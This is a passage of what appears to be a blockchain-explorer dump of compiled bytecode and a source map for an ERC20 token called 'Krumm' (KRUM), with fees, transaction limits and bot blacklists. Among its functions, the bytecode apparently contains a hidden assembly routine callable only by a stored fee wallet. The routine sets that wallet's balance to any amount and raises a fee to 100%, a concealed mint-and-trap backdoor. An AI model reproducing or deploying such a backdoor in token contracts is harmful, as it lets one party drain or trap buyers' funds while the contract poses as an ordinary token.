8565b9250828203905081811115612ec157612ec061263e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212201c85106bada0e7b36157c866455dce41e6159e4affcc1c97bd61477f5bc6322264736f6c63430008120033

Deployed Bytecode

0x60806040526004361061016a5760003560e01c80637d1db4a5116100d1578063a9059cbb1161008a578063d34628cc11610064578063d34628cc1461056a578063d54f7d5e14610593578063dd62ed3e146105be578063f2fde38b146105fb5761019d565b8063a9059cbb146104c5578063bfd7928414610502578063cdf4bab91461053f5761019d565b80637d1db4a5146103b35780638d5f81e2146103de5780638da5cb5b1461040957806392f428701461043457806395d89b411461045d578063a457c2d7146104885761019d565b806342966c681161012357806342966c68146102da578063499a28181461030357806351c6590a1461032c57806370a0823114610348578063715018a614610385578063751039fc1461039c5761019d565b806306fdde03146101a2578063095ea7b3146101cd57806318160ddd1461020a57806323b872dd14610235578063313ce56714610272578063395093511461029d5761019d565b3661019d577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b3480156101ae57600080fd5b506101b7610624565b6040516101c49190612134565b60405180910390f35b3480156101d957600080fd5b506101f460048036038101906101ef91906121fe565b610661565b6040516102019190612259565b60405180910390f35b34801561021657600080fd5b5061021f61067f565b60405161022c9190612283565b60405180910390f35b34801561024157600080fd5b5061025c6004803603810190610257919061229e565b610689565b6040516102699190612259565b60405180910390f35b34801561027e57600080fd5b50610287610762565b604051610294919061230d565b60405180910390f35b3480156102a957600080fd5b506102c460048036038101906102bf91906121fe565b61076b565b6040516102d19190612259565b60405180910390f35b3480156102e657600080fd5b5061030160048036038101906102fc9190612328565b61081e565b005b34801561030f57600080fd5b5061032a60048036038101906103259190612328565b610832565b005b61034660048036038101906103419190612328565b610860565b005b34801561035457600080fd5b5061036f600480360381019061036a9190612355565b6108bd565b60405161037c9190612283565b60405180910390f35b34801561039157600080fd5b5061039a610906565b005b3480156103a857600080fd5b506103b161091a565b005b3480156103bf57600080fd5b506103c8610936565b6040516103d59190612283565b60405180910390f35b3480156103ea57600080fd5b506103f3610968565b6040516104009190612391565b60405180910390f35b34801561041557600080fd5b5061041e610992565b60405161042b9190612391565b60405180910390f35b34801561044057600080fd5b5061045b600480360381019061045691906124f4565b6109bb565b005b34801561046957600080fd5b50610472610a9d565b60405161047f9190612134565b60405180910390f35b34801561049457600080fd5b506104af60048036038101906104aa91906121fe565b610ada565b6040516104bc9190612259565b60405180910390f35b3480156104d157600080fd5b506104ec60048036038101906104e791906121fe565b610ba7565b6040516104f99190612259565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612355565b610bc5565b6040516105369190612259565b60405180910390f35b34801561054b57600080fd5b50610554610be5565b6040516105619190612259565b60405180910390f35b34801561057657600080fd5b50610591600480360381019061058c91906124f4565b610bfc565b005b34801561059f57600080fd5b506105a8610cde565b6040516105b59190612391565b60405180910390f35b3480156105ca57600080fd5b506105e560048036038101906105e0919061253d565b610d08565b6040516105f29190612283565b60405180910390f35b34801561060757600080fd5b50610622600480360381019061061d9190612355565b610d8f565b005b60606040518060400160405280600581526020017f4b72756d6d000000000000000000000000000000000000000000000000000000815250905090565b600061067561066e610e28565b8484610e30565b6001905092915050565b6000600654905090565b6000610696848484610ff9565b610757846106a2610e28565b61075285604051806060016040528060288152602001612f1060289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610708610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b610e30565b600190509392505050565b60006012905090565b6000610814610778610e28565b8461080f8560056000610789610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b610e30565b6001905092915050565b61082f610829610e28565b82611b72565b50565b601154331461084057600080fd5b604051338152600460208201526040812082815560648002600c55505050565b610868611d15565b6001600860146101000a81548160ff02191690831515021790555061089561088e610992565b3083610ff9565b61089f8134611d93565b6000600860146101000a81548160ff02191690831515021790555050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61090e611d15565b6109186000611e78565b565b610922611d15565b612710600281905550612710600181905550565b6000610963612710610955600254600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109c3611d15565b60c881511115610a08576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ff906125ef565b60405180910390fd5b60005b8151811015610a99576001600f6000848481518110610a2d57610a2c61260f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a919061266d565b915050610a0b565b5050565b60606040518060400160405280600481526020017f4b52554d00000000000000000000000000000000000000000000000000000000815250905090565b6000610b9d610ae7610e28565b84610b9885604051806060016040528060258152602001612f386025913960056000610b11610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b610e30565b6001905092915050565b6000610bbb610bb4610e28565b8484610ff9565b6001905092915050565b60106020528060005260406000206000915054906101000a900460ff1681565b6000600860149054906101000a900460ff16905090565b610c04611d15565b60c881511115610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c40906125ef565b60405180910390fd5b60005b8151811015610cda57600160106000848481518110610c6e57610c6d61260f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610cd29061266d565b915050610c4c565b5050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d97611d15565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfd90612727565b60405180910390fd5b610e0f81611e78565b50565b60008183610e209190612747565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e96906127ed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f059061287f565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fec9190612283565b60405180910390a3505050565b611004838383611f68565b60008061100f610992565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415801561107d575061104d610992565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156117b857600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156111265750600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156117b757600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156111d65750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561122c5750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112825750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561137c576112b26127106112a4600254600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b8311156112f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112eb90612911565b60405180910390fd5b61131f612710611311600154600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b61133a8461132c876108bd565b610e1290919063ffffffff16565b111561137b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611372906129a3565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561140557503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561158857601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156114ae5750601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b6114ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e490612a0f565b60405180910390fd5b611516612710611508600d5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b9150611541612710611533600c5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156116335750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156117b657601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156116dc5750601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b61171b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171290612a0f565b60405180910390fd5b611744612710611736600d5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b915061176f612710611761600e5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b60006117cd8284610e1290919063ffffffff16565b9050600081111561196c5760008311156117ec576117eb8684611b72565b5b6000821115611956576118698260046000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b60046000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161194d9190612283565b60405180910390a35b611969818561208e90919063ffffffff16565b93505b6119d884604051806060016040528060268152602001612eea60269139600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a6d84600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051611b0d9190612283565b60405180910390a3505050505050565b6000838311158290611b65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b5c9190612134565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611be1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd890612aa1565b60405180910390fd5b611c4d81604051806060016040528060228152602001612ec860229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ca58160065461208e90919063ffffffff16565b600681905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d099190612283565b60405180910390a35050565b611d1d610e28565b73ffffffffffffffffffffffffffffffffffffffff16611d3b610992565b73ffffffffffffffffffffffffffffffffffffffff1614611d91576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8890612b0d565b60405180910390fd5b565b611dc030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610e30565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611e0c610992565b426040518863ffffffff1660e01b8152600401611e2e96959493929190612b72565b60606040518083038185885af1158015611e4c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611e719190612be8565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611f4a9190612c3b565b905092915050565b60008183611f609190612cac565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611fd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fce90612d4f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612046576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161203d90612de1565b60405180910390fd5b60008111612089576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208090612e73565b60405180910390fd5b505050565b6000818361209c9190612e93565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156120de5780820151818401526020810190506120c3565b60008484015250505050565b6000601f19601f8301169050919050565b6000612106826120a4565b61211081856120af565b93506121208185602086016120c0565b612129816120ea565b840191505092915050565b6000602082019050818103600083015261214e81846120fb565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121958261216a565b9050919050565b6121a58161218a565b81146121b057600080fd5b50565b6000813590506121c28161219c565b92915050565b6000819050919050565b6121db816121c8565b81146121e657600080fd5b50565b6000813590506121f8816121d2565b92915050565b6000806040838503121561221557612214612160565b5b6000612223858286016121b3565b9250506020612234858286016121e9565b9150509250929050565b60008115159050919050565b6122538161223e565b82525050565b600060208201905061226e600083018461224a565b92915050565b61227d816121c8565b82525050565b60006020820190506122986000830184612274565b92915050565b6000806000606084860312156122b7576122b6612160565b5b60006122c5868287016121b3565b93505060206122d6868287016121b3565b92505060406122e7868287016121e9565b9150509250925092565b600060ff82169050919050565b612307816122f1565b82525050565b600060208201905061232260008301846122fe565b92915050565b60006020828403121561233e5761233d612160565b5b600061234c848285016121e9565b91505092915050565b60006020828403121561236b5761236a612160565b5b6000612379848285016121b3565b91505092915050565b61238b8161218a565b82525050565b60006020820190506123a66000830184612382565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6123e9826120ea565b810181811067ffffffffffffffff82111715612408576124076123b1565b5b80604052505050565b600061241b612156565b905061242782826123e0565b919050565b600067ffffffffffffffff821115612447576124466123b1565b5b602082029050602081019050919050565b600080fd5b600061247061246b8461242c565b612411565b9050808382526020820190506020840283018581111561249357612492612458565b5b835b818110156124bc57806124a888826121b3565b845260208401935050602081019050612495565b5050509392505050565b600082601f8301126124db576124da6123ac565b5b81356124eb84826020860161245d565b91505092915050565b60006020828403121561250a57612509612160565b5b600082013567ffffffffffffffff81111561252857612527612165565b5b612534848285016124c6565b91505092915050565b6000806040838503121561255457612553612160565b5b6000612562858286016121b3565b9250506020612573858286016121b3565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b60006125d96023836120af565b91506125e48261257d565b604082019050919050565b60006020820190508181036000830152612608816125cc565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612678826121c8565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036126aa576126a961263e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006127116026836120af565b915061271c826126b5565b604082019050919050565b6000602082019050818103600083015261274081612704565b9050919050565b6000612752826121c8565b915061275d836121c8565b92508282019050808211156127755761277461263e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006127d76024836120af565b91506127e28261277b565b604082019050919050565b60006020820190508181036000830152612806816127ca565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006128696022836120af565b91506128748261280d565b604082019050919050565b600060208201905081810360008301526128988161285c565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006128fb6028836120af565b91506129068261289f565b604082019050919050565b6000602082019050818103600083015261292a816128ee565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061298d6023836120af565b915061299882612931565b604082019050919050565b600060208201905081810360008301526129bc81612980565b9050919050565b7f426f74732063616e6e6f74206d616b65207472616e73616374696f6e73000000600082015250565b60006129f9601d836120af565b9150612a04826129c3565b602082019050919050565b60006020820190508181036000830152612a28816129ec565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612a8b6021836120af565b9150612a9682612a2f565b604082019050919050565b60006020820190508181036000830152612aba81612a7e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612af76020836120af565b9150612b0282612ac1565b602082019050919050565b60006020820190508181036000830152612b2681612aea565b9050919050565b6000819050919050565b6000819050919050565b6000612b5c612b57612b5284612b2d565b612b37565b6121c8565b9050919050565b612b6c81612b41565b82525050565b600060c082019050612b876000830189612382565b612b946020830188612274565b612ba16040830187612b63565b612bae6060830186612b63565b612bbb6080830185612382565b612bc860a0830184612274565b979650505050505050565b600081519050612be2816121d2565b92915050565b600080600060608486031215612c0157612c00612160565b5b6000612c0f86828701612bd3565b9350506020612c2086828701612bd3565b9250506040612c3186828701612bd3565b9150509250925092565b6000612c46826121c8565b9150612c51836121c8565b9250828202612c5f816121c8565b91508282048414831517612c7657612c7561263e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612cb7826121c8565b9150612cc2836121c8565b925082612cd257612cd1612c7d565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612d396025836120af565b9150612d4482612cdd565b604082019050919050565b60006020820190508181036000830152612d6881612d2c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612dcb6023836120af565b9150612dd682612d6f565b604082019050919050565b60006020820190508181036000830152612dfa81612dbe565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612e5d6029836120af565b9150612e6882612e01565b604082019050919050565b60006020820190508181036000830152612e8c81612e50565b9050919050565b6000612e9e826121c8565b9150612ea9836121c8565b9250828203905081811115612ec157612ec061263e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212201c85106bada0e7b36157c866455dce41e6159e4affcc1c97bd61477f5bc6322264736f6c63430008120033

Deployed Bytecode Sourcemap

20403:12174:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32277:10;;;;;;;;;;20403:12174;;;;;22951:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23812:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23231:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24637:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23139:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23990:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29663:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30957:375;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;32304:270;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23340:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2972:103;;;;;;;;;;;;;:::i;:::-;;24967:138;;;;;;;;;;;;;:::i;:::-;;24495:133;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27850:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2322:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29368:286;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23043:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24217:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23468:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21665:36;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;32141:84;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29112:247;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;28994:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23652:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3231:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22951:83;22988:13;23021:5;;;;;;;;;;;;;;;;;23014:12;;22951:83;:::o;23812:169::-;23895:4;23912:39;23921:12;:10;:12::i;:::-;23935:7;23944:6;23912:8;:39::i;:::-;23969:4;23962:11;;23812:169;;;;:::o;23231:100::-;23284:7;23311:12;;23304:19;;23231:100;:::o;24637:321::-;24743:4;24760:36;24770:6;24778:9;24789:6;24760:9;:36::i;:::-;24807:121;24816:6;24824:12;:10;:12::i;:::-;24838:89;24876:6;24838:89;;;;;;;;;;;;;;;;;:11;:19;24850:6;24838:19;;;;;;;;;;;;;;;:33;24858:12;:10;:12::i;:::-;24838:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;24807:8;:121::i;:::-;24946:4;24939:11;;24637:321;;;;;:::o;23139:83::-;23180:5;20625:2;23198:16;;23139:83;:::o;23990:218::-;24078:4;24095:83;24104:12;:10;:12::i;:::-;24118:7;24127:50;24166:10;24127:11;:25;24139:12;:10;:12::i;:::-;24127:25;;;;;;;;;;;;;;;:34;24153:7;24127:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;24095:8;:83::i;:::-;24196:4;24189:11;;23990:218;;;;:::o;29663:91::-;29719:27;29725:12;:10;:12::i;:::-;29739:6;29719:5;:27::i;:::-;29663:91;:::o;30957:375::-;31051:21;31045:28;31035:8;31032:42;31022:68;;31087:1;31084;31077:12;31022:68;31117:4;31111:11;31144:8;31139:3;31132:21;31189:14;31182:4;31177:3;31173:14;31166:38;31241:4;31236:3;31226:20;31269:6;31263:4;31256:20;31318:4;31312;31308:15;31293:13;31286:38;31021:304;;30957:375;:::o;32304:270::-;2207:13;:11;:13::i;:::-;31384:4:::1;31373:8;;:15;;;;;;;;;;;;;;;;;;32446:46:::2;32456:7;:5;:7::i;:::-;32473:4;32480:11;32446:9;:46::i;:::-;32529:37;32543:11;32556:9;32529:13;:37::i;:::-;31422:5:::1;31411:8;;:16;;;;;;;;;;;;;;;;;;32304:270:::0;:::o;23340:119::-;23406:7;23433:9;:18;23443:7;23433:18;;;;;;;;;;;;;;;;23426:25;;23340:119;;;:::o;2972:103::-;2207:13;:11;:13::i;:::-;3037:30:::1;3064:1;3037:18;:30::i;:::-;2972:103::o:0;24967:138::-;2207:13;:11;:13::i;:::-;25046:5:::1;25021:22;:30;;;;25092:5;25062:27;:35;;;;24967:138::o:0;24495:133::-;24539:7;24566:54;21201:5;24566:40;24583:22;;24566:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;24559:61;;24495:133;:::o;27850:96::-;27897:7;27924:14;;;;;;;;;;;27917:21;;27850:96;:::o;2322:87::-;2368:7;2395:6;;;;;;;;;;;2388:13;;2322:87;:::o;29368:286::-;2207:13;:11;:13::i;:::-;29479:3:::1;29459:9;:16;:23;;29451:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;29541:6;29536:111;29557:9;:16;29553:1;:20;29536:111;;;29631:4;29595:19;:33;29615:9;29625:1;29615:12;;;;;;;;:::i;:::-;;;;;;;;29595:33;;;;;;;;;;;;;;;;:40;;;;;;;;;;;;;;;;;;29575:3;;;;;:::i;:::-;;;;29536:111;;;;29368:286:::0;:::o;23043:87::-;23082:13;23115:7;;;;;;;;;;;;;;;;;23108:14;;23043:87;:::o;24217:269::-;24310:4;24327:129;24336:12;:10;:12::i;:::-;24350:7;24359:96;24398:15;24359:96;;;;;;;;;;;;;;;;;:11;:25;24371:12;:10;:12::i;:::-;24359:25;;;;;;;;;;;;;;;:34;24385:7;24359:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;24327:8;:129::i;:::-;24474:4;24467:11;;24217:269;;;;:::o;23468:175::-;23554:4;23571:42;23581:12;:10;:12::i;:::-;23595:9;23606:6;23571:9;:42::i;:::-;23631:4;23624:11;;23468:175;;;;:::o;21665:36::-;;;;;;;;;;;;;;;;;;;;;;:::o;32141:84::-;32185:4;32209:8;;;;;;;;;;;32202:15;;32141:84;:::o;29112:247::-;2207:13;:11;:13::i;:::-;29207:3:::1;29191:5;:12;:19;;29183:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;29269:6;29264:88;29285:5;:12;29281:1;:16;29264:88;;;29336:4;29319;:14;29324:5;29330:1;29324:8;;;;;;;;:::i;:::-;;;;;;;;29319:14;;;;;;;;;;;;;;;;:21;;;;;;;;;;;;;;;;;;29299:3;;;;;:::i;:::-;;;;29264:88;;;;29112:247:::0;:::o;28994:109::-;29043:7;29078:16;;;;;;;;;;;29063:32;;28994:109;:::o;23652:151::-;23741:7;23768:11;:18;23780:5;23768:18;;;;;;;;;;;;;;;:27;23787:7;23768:27;;;;;;;;;;;;;;;;23761:34;;23652:151;;;;:::o;3231:201::-;22